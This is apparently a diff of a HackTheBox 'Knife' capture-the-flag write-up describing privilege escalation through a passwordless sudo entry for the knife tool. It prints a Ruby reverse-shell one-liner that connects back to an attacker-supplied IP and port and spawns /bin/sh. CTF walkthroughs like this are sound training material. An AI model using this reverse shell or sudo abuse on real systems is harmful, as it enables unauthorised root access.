7RU7H/CTFs/HackTheBox/Retired-Machines/Knife/Knife-Writeup.md

 ```
 ## Privilege Escalation

+Before even uploading LinPeas I went through the initial PrivEsc checks manually and actually started with `sudo -l`:
 ![](nopasswdsudoknife.png)

+Knife is a ruby application that with `sudo nopasswd`
 ![](gtfobinsknife.png)

-Basically it can execute ruby
+basically it can execute anything at a root level.
+The initial thinking about a shell went to this, although looking though in code it seemed like the wrong choice.
 ```ruby
 knife exec -E 'ruby -rsocket -e'f=TCPSocket.open("$IP",$PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)''
 ```
-I thought against the reverse shell as I could not find any documentation on rsockets
+I thought against the reverse shell as I could not find any documentation on `-rsockets` - dorking problems circa late 2024 still an issue.

+So I looked up exec() and system() functions to use to just exec another bash shell:
 ![](root.png)
 ROOT!
 ![](root2.png)